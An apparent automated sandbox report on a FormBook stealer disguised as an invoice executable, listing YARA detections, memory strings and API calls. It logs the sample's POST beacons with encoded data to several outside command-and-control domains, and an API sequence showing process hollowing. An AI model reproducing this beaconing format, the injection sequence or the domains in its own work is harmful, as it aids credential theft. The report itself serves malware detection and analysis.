          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUz
          Source: global trafficHTTP traffic detected: GET /an0m/?abN8C=Y8StOgjTBUc2RVi6CYGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwjT9KknvY5b&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1Host: www.yr-ct.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=w0B5E3Tvv+w/kd6Kt5bRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAuh1jmwBHT3 HTTP/1.1Host: www.magentos.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=ItsweDGFEIfkN8iGMiT/CcI9tOGzcRma3szN3awFj2f289L7MYRfsokf4asOwmhwfWcg HTTP/1.1Host: www.aj-buckley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?abN8C=kOFDBNZQA2sT84b4nGvJlEsnJlkbfDKocHJFzldP3EC4MwSwQZ17LsPPvOWyctfqTmcO&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1Host: www.mommietalk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.yr-ct.com
          Source: unknownHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6a 33 52 49 35 4b 46 6f 6d 49 55 57 50 30 43 64 71 41 4c 49 67 52 4b 35 6b 2d 31 30 28 55 4a 50 43 70 6b 68 31 41 78 5a 79 66 70 30 78 30 6b 64 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 72 69 35 6a 72 52 47 36 36 44 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMj3RI5KFomIUWP0CdqALIgRK5k-10(UJPCpkh1AxZyfp0x0kd2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6ri5jrRG66Dndjt-Cg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jun 2020 08:17:54 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 295Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 6e 30 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 67 65 6e 74 6f 73 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /an0m/ was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.magentos.info Port 80</address></body></html>
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.832775917.00000000034B0000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmp, WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000003.00000002.833417320.00000000036C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: WWAHost.exe, 00000008.00000002.828491882.0000000000510000.00000004.00000020.sdmpString found in binary or memory: http://www.google.ch/
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp&
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh(
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpH
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.456343168.000000000CE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmp, WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1K
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmp, WWAHost.exe, 00000008.00000002.831361028.00000000031F8000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
          Source: WWAHost.exe, 00000008.00000003.582440791.0000000000550000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=ssl$6e
          Source: WWAHost.exe, 00000008.00000003.582352244.0000000000537000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMh
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslW
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslp
          Source: WWAHost.exe, 00000008.00000002.828623149.0000000000539000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/favicon.ico
          Source: WWAHost.exe, 00000008.00000002.828591306.0000000000534000.00000004.00000020.sdmpString found in binary or memory: https://www.google.ch/gws_rd=ssll

          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0042A710 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_0042A710
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00444400 GetKeyboardState,0_2_00444400
          Source: Invoice_CAII00008052.exe, 00000000.00000002.419916274.00000000007D0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Invoice_CAII00008052.exe
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00461F98 NtdllDefWindowProc_A,0_2_00461F98
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00462740 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00462740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004627F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_004627F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004572C4 GetSubMenu,SaveDC,RestoreDC,72B7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_004572C4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0044737C NtdllDefWindowProc_A,GetCapture,0_2_0044737C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004337B0 NtdllDefWindowProc_A,0_2_004337B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C00AB NtCreateSection,0_2_007C00AB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C04E6 VirtualAlloc,CreateProcessW,NtUnmapViewOfSection,GetThreadContext,SetThreadContext,NtResumeThread,0_2_007C04E6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C369B NtMapViewOfSection,0_2_007C369B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C7980 NtQueryInformationProcess,NtQueryInformationProcess,0_2_007C7980
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_007C6CB4 SetThreadContext,NtResumeThread,0_2_007C6CB4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417870 NtAllocateVirtualMemory,2_2_00417870
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417690 NtCreateFile,2_2_00417690
